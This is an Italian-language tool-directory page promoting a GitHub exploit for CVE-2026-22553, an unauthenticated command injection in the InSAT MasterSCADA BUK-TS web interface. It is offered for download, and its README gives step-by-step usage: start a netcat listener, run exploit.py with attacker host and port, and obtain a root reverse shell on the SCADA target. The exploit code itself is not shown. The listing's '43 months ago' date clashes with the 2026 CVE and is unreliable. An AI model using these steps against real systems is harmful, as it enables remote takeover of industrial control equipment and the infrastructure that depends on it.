Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ — Exploit di iniezione di comandi del sistema operativo non autenticato per l'interfaccia web InSAT MasterSCADA BUK-TS MMadmServ. Fornisce una reverse shell con privilegi di root tramite richiesta HTTP POST. CVSS 9.8 critico. | Kitploit
Strumenti/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
Generazione di PayloadExploitSicurezza SCADA/ICSSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

Exploit di iniezione di comandi del sistema operativo non autenticato per l'interfaccia web InSAT MasterSCADA BUK-TS MMadmServ. Fornisce una reverse shell con privilegi di root tramite richiesta HTTP POST. CVSS 9.8 critico.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
43 mesi faNon ancora revisionato
Condividi

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - RCE non autenticata

CVE-2026-22553 | CVSS 9.8 Critico | Autore dell'exploit: Mohammed Idrees Banyamer


📝 Descrizione

InSAT MasterSCADA BUK-TS soffre di una vulnerabilità di OS Command Injection non autenticata nell'interfaccia web MMadmServ. Questa falla consente a un attaccante remoto di ottenere la piena esecuzione di codice in remoto (RCE) senza alcuna autenticazione.

  • Prodotto interessato: InSAT MasterSCADA BUK-TS (Tutte le versioni)
  • Tipo di vulnerabilità: OS Command Injection (CWE-78)
  • Gravità: Critico (CVSS v3.1 Score: 9.8)
  • Autore dell'exploit:
Mohammed Idrees Banyamer
  • Paese: Giordania 🇯🇴

  • 🛠️ Diagramma del metodo di attacco

    root@kitploit:~
    flowchart TD
        A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
        B -->|Unauthenticated| C[Vulnerable Parameter]
        C -->|OS Command Injection| D[Command Execution on Target Server]
        D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
        
        style A fill:#ff4d4d,stroke:#fff
        style E fill:#4dff88,stroke:#fff

    🚀 Uso

    root@kitploit:~
    python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
    

    Esempio

    root@kitploit:~
    python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
    

    Opzioni

    OpzioneDescrizione
    targetURL di destinazione (es. http://ip:port)
    --lhostIl tuo indirizzo IP (reverse shell)
    --lportLa tua porta in ascolto

    📌 Come usare

    1. Avvia un listener sulla tua macchina:

      root@kitploit:~
      nc -lvnp 4444
      
    2. Esegui l'exploit:

      root@kitploit:~
      python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
      
    3. Ottieni una reverse shell con privilegi root/sistema.


    ⚠️ Disclaimer

    Questo exploit è fornito esclusivamente per scopi educativi e di test di penetrazione autorizzati.
    L'uso non autorizzato contro sistemi che non possiedi è illegale e potrebbe violare leggi internazionali.
    L'autore non è responsabile per qualsiasi uso improprio.


    📬 Autore

    Mohammed Idrees Banyamer

    • Instagram: @banyamer_security
    • GitHub: mbanyamer
    • Paese: Giordania 🇯🇴

    Assegna una stella ⭐ a questo repository se lo trovi utile!

    Scarica lo strumento